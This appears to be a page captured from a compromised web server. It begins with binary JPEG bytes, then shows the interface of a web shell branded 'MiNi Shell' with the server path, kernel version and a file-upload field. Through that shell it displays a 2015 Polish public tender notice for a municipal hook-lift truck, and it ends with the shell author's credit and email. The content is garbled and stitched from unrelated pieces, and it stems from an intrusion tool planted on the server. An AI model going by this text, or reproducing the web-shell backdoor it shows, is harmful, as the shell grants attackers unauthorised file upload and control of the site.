JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150813/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150813/207580-N-2015.html

<p class="kh_header"><b>Biłgoraj: Dostawa do siedziby PGK Sp. z o.o. w Biłgoraju, ul. Łąkowa 13, fabrycznie nowego samochodu ciężarowego z zabudową hakową na potrzeby ZOŚ oraz świadczenie usług serwisowych w okresie gwarancji. Znak zamówienia nadany przez Zamawiającego ZP/ZOŚ/4/2015</b><br>
<b>Numer ogłoszenia: 207580 - 2015; data zamieszczenia: 13.08.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Przedsiębiorstwo Gospodarki Komunalnej Sp. z o.o. , ul. Łąkowa 13, 23-400 Biłgoraj, woj. lubelskie, tel. 084 6881852, 6882916, faks 084 6881847.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pgk.biuletyn-publiczny.net</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa do siedziby PGK Sp. z o.o. w Biłgoraju, ul. Łąkowa 13, fabrycznie nowego samochodu ciężarowego z zabudową hakową na potrzeby ZOŚ oraz świadczenie usług serwisowych w okresie gwarancji. Znak zamówienia nadany przez Zamawiającego ZP/ZOŚ/4/2015.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest dostawa do siedziby zamawiającego - ul. Łąkowa 13, 23-400 Biłgoraj 1 sztuki fabrycznie nowego - rok produkcji 2015, samochodu ciężarowego z zabudową hakową, oraz świadczenie usług serwisowych w okresie gwarancji, o następujących wymaganych minimalnych parametrach technicznych  i wyposażeniu:
1)	DMC pojazdu 16t
2)	Kabina dzienna, trzyosobowa ze stalowym zderzakiem, kolor biały
3)	Okno w tylnej ścianie kabiny
4)	Szyba przednia i lusterka ogrzewane elektrycznie
5)	Lusterko szerokokątne umieszczone z przodu kabiny 
6)	Centralny zamek z pilotem
7)	Światła do jazdy dziennej LED 
8)	Reflektory przednie z regulatorem poziomu
9)	Przednie światła przeciwmgielne
10)	Listwa z oświetleniem ostrzegawczym zamontowana na kabinie o długości min. 1200 mm
11)	Klosze lamp tylnych zabezpieczone metalową kratką przed uszkodzeniem
12)	Kolumna kierownicy regulowana w dwóch płaszczyznach
13)	Fotel kierowcy na zawieszeniu pneumatycznym ze zintegrowanym zagłówkiem, trzypunktowym pasem bez-pieczeństwa i podłokietnikiem
14)	Podwójny fotel zmiennika z zagłówkami i trzypunktowymi pasami bezpieczeństwa
15)	Ręcznie lub automatycznie sterowana klimatyzacja z recyrkulacją powietrza
16)	Fabryczny immobilizer
17)	Oś przednia na zawieszeniu resorowym o nośności min. 5.8 t
18)	Oś tylna na parabolicznym zawieszeniu piórowym o nośności min. 10,5 t
19)	Koła o rozmiarze 285/70R19,5 z bieżnikiem terenowym, koło zapasowe 
20)	Silnik wysokoprężny o pojemności minimum 5,1 l i mocy min. 215 KM, spełniający normę emisji spalin Euro 6
21)	Skrzynia biegów min. 6 biegów do przodu
22)	Fabryczna przystawka dodatkowego odbioru mocy do napędu zabudowy hakowej
23)	Wlot powietrza do filtra powietrza na dachu kabiny
24)	Blokada tylnego mostu, ASR
25)	Elektroniczny układ kontroli stabilności jazdy VSC lub ESP
26)	Tempomat adaptacyjny z funkcją ostrzegania przed uderzeniem w tył pojazdu poprzedzającego i awaryjnym układem hamulcowym
27)	Układ ostrzegania przed opuszczeniem pasa ruchu z sygnałem akustycznym
28)	Akustyczny sygnalizator biegu wstecznego
29)	Wentylowane hamulce tarczowe na wszystkich kołach
30)	Rozstaw osi pojazdu 3700 - 3800 mm
31)	Zaczep do holowania z przodu pojazdu
32)	Zbiornik paliwa o pojemności min. 200 l z korkiem zamykanym na kluczyk
33)	Ręczny główny wyłącznik prądu przy akumulatorach
34)	Podgrzewany filtr paliwa z separatorem
35)	Klin pod koło 2 szt., apteczka, gaśnica, trójkąt ostrzegawczy 2 szt., kamizelki ostrzegawcze 2 szt., dywaniki gumowe, pokrowce na siedzenia, Radioodtwarzacz,  światła robocze na tylnej ścianie kabiny
36)	Zabudowa hakowa o nominalnej mocy załadunkowej minimum 8 ton
37)	Obsługa pojemników KP7, KP10, KP15, KP20
38)	Czopy siłowników ramienia kątowego przykręcane na śruby lub dospawane do urządzenia
39)	 Rolki zapewniające stabilność prowadzenia kontenera
40)	Rama zabudowy hakowej wykonana z wysoko gatunkowej stali
41)	Belki wewnętrzne ramy przykręcone na śruby lub dospawane do urządzenia
42)	Sterowanie urządzeniem hakowym z wewnątrz i z zewnątrz pojazdu .
43)	Siłowniki główne o średnicy min. O 125 mm 
44)	Blokada hydrauliczna kontenera wewnętrzna przykręcana na śruby lub dospawana do urządzenia
45)	Pompa hydrauliczna 
46)	Łożyskowanie wysuwu haka urządzenia na ternamidzie
47)	Wszystkie elementy montażowe urządzenia hakowego cynkowane ogniowo
48)	Światła obrysowe  
49)	Konstrukcja stalowa śrutowana, następnie malowana farbą podkładową epoksydową,
50)	Odbiór UDT
51)	Skrzynka narzędziowa
52)	Pojemnik do mycia rąk
53)	Tylna rolka podporowa sterowana hydraulicznie
54)	Kosz na siatkę 
55)	Oznaczenie konturowe zgodne z Kodeksem Drogowym
56)	Pojazd dostosowany do ruchu prawostronnego
57)	Pojazd musi spełniać warunki techniczne umożliwiające jego rejestrację na terenie RP po 30.11.2015 roku,
58)	Wysokość haka 1.200 mm
59)	Sterowanie pneumatyczne z kabiny kierowcy oraz awaryjne mechaniczne poprzez cięgna umieszczone na ra-mie hakowca
60)	Rolki najazdowe osadzone na niezależnej osi w stosunku do osi ramy tylnej

- Wymagany termin dostawy - do dnia 30 listopada 2015 r.
- Zamawiający wymaga aby Wykonawca wraz z dostawą pojazdu przedłożył następujące dokumenty: instrukcja ob-sługi w j. polskim, książka gwarancyjna/serwisowa, homologacja, kompletne dokumenty niezbędne do rejestracji na terenie RP po 30.11.2015 r., dokument potwierdzający spełnienie wymagań normy emisji spalin EURO 6.
- Wykonawca przeszkoli wskazanych pracowników Zamawiającego w obsłudze pojazdu.
2. Wymagane warunki udzielenia gwarancji, obligatoryjnych przeglądów gwarancyjnych, usług serwisowych w okresie gwarancji i po upływie okresu gwarancji.
1) Zamawiający wymaga, aby okres udzielonej przez wykonawcę gwarancji na kompletny pojazd wynosił co najmniej 12 miesięcy, licząc od daty przekazania przedmiotu zamówienia zamawiającemu.
2) Zamawiający wymaga od wykonawcy aby w okresie trwania gwarancji wykonał obligatoryjne przeglądy przedmiotu zamówienia.
Wykonawca zobowiązany jest do wpisania w punkcie A ppkt 5 formularza oferty wszystkich oferowanych rodzajów przeglądów kompletnego pojazdu oraz kosztów przeglądów wraz z kosztem materiałów.
3) Zamawiający wymaga aby ceny oferowanych przeglądów w okresie gwarancji wraz z kosztem materiałów zostały uwzględnione w ostatecznej cenie dostawy tj. cenie składanej oferty. Wykonawca w formularzu oferty składa oświadczenie o uwzględnieniu ceny przeglądów wraz z kosztem materiałów w oferowanej cenie za wykonanie przedmiotu zamówienia.
Wykonawca w punkcie A ppkt 5 formularza oferty zobowiązany jest podać nazwę, adres, telefon, fax autoryzowanego podmiotu, który będzie wykonawcą przeglądów gwarancyjnych.
4) Zamawiający wymaga od wykonawcy świadczenia usług serwisowych w okresie gwarancyjnym w przypadku  zaistnienia niesprawności przedmiotu zamówienia.
Wymagany przez zamawiającego okres przystąpienia wykonawcy do świadczenia usług serwisowych w okresie  gwarancyjnym, to 24 godziny od terminu powiadomienia wykonawcy pismem, faxem o  stwierdzonej niesprawności, wadzie, usterce przedmiotu zamówienia.
5)	Wykonawca musi posiadać serwis gwarancyjny na terenie Polski. (Wykonawca w punkcie A ppkt 5. formularza ofertowego zobowiązany jest podać adres serwisu, w którym świadczone będą usługi serwisowe, zlokalizowanego najbliżej siedziby Zamawiającego, tj. ul. Łąkowa 13, 23-400 Biłgoraj.)
6)	Wykonawca zobowiązany jest wykonywać świadczenie usług serwisowych, po upływie okresu gwarancji. Zamawiający zawiadamiał będzie Wykonawcę pismem lub faksem o zaistniałej niesprawności przedmiotu zamówienia. (Wykonawca w punkcie A ppkt 7. formularza ofertowego zobowiązany jest podać: - okres świadczenia usług serwisowych po upływie gwarancji (wymagany okres minimum 10 lat), liczbę godzin przystąpienia do świadczenia usług serwisowych od momentu zgłoszenia przez Zamawiającego o niesprawności pojazdu oraz adres serwisu zlokalizowanego najbliżej siedziby Zamawiającego, tj. ul. Łąkowa 13, 23-400 Biłgoraj, który wykonywał będzie usługi serwisowe po upływie okresu gwarancji.).
7)	Wykonawca zapewni stały dostęp do części zamiennych dla przedmiotu zamówienia. Dostawa części zamiennych do siedziby zamawiającego w terminie do 5 dni od daty otrzymania od zamawiającego pisemnie lub faksem zapotrzebowania..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 34.13.00.00-7, 50.11.20.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Zamawiający wymaga wniesienia wadium w kwocie - 8 600,00 zł. (słownie : osiem tysięcy sześćset 00/100 zł)
2.Wadium należy wnieść w jednej z następujących form:
1) w pieniądzu, przelewem na rachunek bankowy: na konto zamawiającego PKO BP Biłgoraj -
nr rachunku: 42 1020 5385 0000 9602 0002 5627 z adnotacją dostawa samochodu z zabudową hakową. 
2) w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że poręczenie kasy jest zobowiązaniem pieniężnym,
3) w gwarancjach bankowych, 
4) w gwarancjach ubezpieczeniowych 
5) w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275, z 2008 r. Nr 116, poz. 730 i 732 i Nr 227, poz. 1505 oraz z 2010 r. Nr 96, poz. 620) 
 - Dokument w formie poręczenia winien zawierać stwierdzenie, że na pierwsze pisemne żądanie zamawiającego wzywające do zapłaty wadium, zgodnie z warunkami przetargu, następuje jego bezwarunkowa wypłata bez jakichkolwiek zastrzeżeń.
3. Za termin wniesienia wadium w formie przelewu pieniężnego przyjmuje się termin uznania na rachunku zamawiającego. 
4. W zakresie wadium obowiązują uregulowania Prawa zamówień publicznych zawarte w art. 45 i 46.
5. Wadium jest wnoszone na okres związania ofertą.
6. Do oferty należy dołączyć dokument potwierdzający (oryginał) wniesienie wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>przewiduje się udzielenie zaliczek na poczet wykonania zamówienia</b></li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia tego warunku  na podstawie złożonego oświadczenia z art. 22 ust 1 Pzp.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania tego warunku na podstawie wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,  z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców. Przez zakres niezbędny do wykazania spełnienia warunku wiedzy i doświadczenia należy rozumieć wykonanie lub wykonywanie w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 dostaw samochodu ciężarowego z zabudową hakową.
Do wymienionych w wykazie dostaw, Zamawiający wymaga załączenia dowodów - dokumentów potwierdzających, że każda z tych dostaw została wykonana lub jest wykonywana należycie. Niespełnienie przez Wykonawcę warunku posiadania wiedzy i doświadczenia spowoduje wykluczenie Wykonawcy z postępowania o udzielenie zamówienia publicznego.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia warunku na podstawie przedłożonego oświadczenia z art. 22 ust 1 Pzp</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia warunku na podstawie przedłożonego oświadczenia z art. 22 ust 1 Pzp</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia warunku na podstawie przedłożonego oświadczenia z art. 22 ust 1 Pzp</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>pełnomocnictwo jeżeli jest wymagane, oryginał potwierdzenia wniesienia wadium</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 96</li>
<li>2 - Okres gwarancji - 4</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pgk.biuletyn-publiczny.net<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ul. Łąkowa 13, 23-400 Biłgoraj, Przedsiębiorstwo Gospodarki Komunalnej Sp.   z o.o. w Biłgoraju , pokój nr 12.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.08.2015 godzina 10:00, miejsce: sekretariat (pokój nr 1) w siedzibie Zamawiającego ul. Łąkowa 13, 23-400 Biłgoraj.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie realizowane w ramach przedsięwzięcia p. n. Budowa Punktu Selektywnego Zbierania Odpadów Komunalnych Lamusownia dofinansowanego ze środków Programu Priorytetowego NFOŚiGW- Ochrona Powierzchni Ziemi- 3.1.2 Rozwój selektywnej zbiorki odpadów.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com